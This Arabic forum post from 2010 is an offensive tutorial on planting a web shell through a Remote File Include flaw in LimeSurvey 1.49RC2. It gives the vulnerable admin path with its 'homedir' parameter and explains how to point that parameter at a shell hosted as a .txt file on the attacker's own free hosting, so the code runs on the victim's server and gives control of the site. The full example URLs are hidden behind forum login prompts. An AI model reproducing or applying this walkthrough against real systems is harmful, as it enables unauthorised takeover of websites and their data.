كيف الحال يا شباب عساكم بخير ان شاء الله، اليوم راح نتناول طريقه أخرى من الطرق الخاصه برفع الشل لنتابع ....
- رفع الشيل عبر ثغرات File Include فايل إنكلود -
اليوم راح نتناول طريقه رفع الشل من خلال ثغره فايل إنكلود ، ويمكننا البحث عن الثغرات من خلال أحد مواقع الحمايه وأهمها موقع
milw0rm
SecurityReason.com - Our Reason is Security
أنا أخترت ثغره من الميلوورم ، وبياناتها كما في الصورة التالية :
كما هو واضح من الصورة هذه هي بيانات الثغرة وقد قسمتها لجزئين الأول خاص ببيانات الثغره التي تهمنا ، والجزء الثاني هو الإستغلال ، وسوف نتناول في البداية الجزء الأول ...
طبعاً هنالك عدة نقاط يجب معرفتها قبل عملية الاختراق ومن خلال النظر في الصورة نجد أن النقاط أو المعلومات التي تهمنا هي :
1- نوع الثغره ومن الصورة نجد أن نوعها هو ..
كود:
Type : RFI(Remote File Include)
أي ثغره من نوع فايل إنكلود .
2- اسم السكربت المصاب :
كود:
****** name : LimeSurvey (PHPSurveyor)
3-الإصدار المصاب وهو :
كود:
Version : 1.49RC2
المعلومة الأخيرة التي نحتاجها موجودة في القسم رقم 2 وهي الإستغلال وكما نلاحظ هنالك العديد من طرق الإستغلال للثغره ، وسوف نتناول أحدها :
كود:
/admin/classes/pear/OLE/PPS/File.php?homedir=[****l]
الأن سوف نقوم بتطبيق المعطيات السابقه ، أمامنا كمثال الموقع التالي :
كود:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] والسكربت المصاب والإصدار هو :
كود:
LimeSurvey والإصدار 1.49RC2
وهو راكب عليه هكذا :
كود:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] إذا بما أن السكربت داخل مجلد ls فان تطبيق الاستغلال سوف يكون كما يلي :
كود:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] بكذا نكون طبقنا الإستغلال وتبقى لنا إستبدال عبارة [****l]برابط الشل الذي رفعناه في الدرس السابق على مساحتنا المجانية ولنفرض أن رابط الشل كما يلي :
كود:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] لاحظوا أن امتداده txt وليس php وهذا أمر مهم جداً لأننا نريد سحب الأكواد من المفكرة وترجمتها بالموقع المصاب وليس قراءة الملف في الموقع اللي رافعين عليه الشيل
وعليه سوف يكون الاستغلال بصورته النهائية كما يلي :
كود:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] وبكذا نكون أمرنا السكريبت بأن يقوم بإدراج أكواد هذي الصفحة :
كود:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] داخل موقع الضحية وقراءتها على سيرفر الضحية ، ونقدر نتحكم بالموقع كامل من خلال هذي الطريقه ..
وكذا نكون قد اتممنا الجزء 2 وإلى لقاء قادم إنشاء الله
ودمتم سالمين
تحيات \بيكو..........هكر
الأحد أكتوبر 03, 2010 3:31 am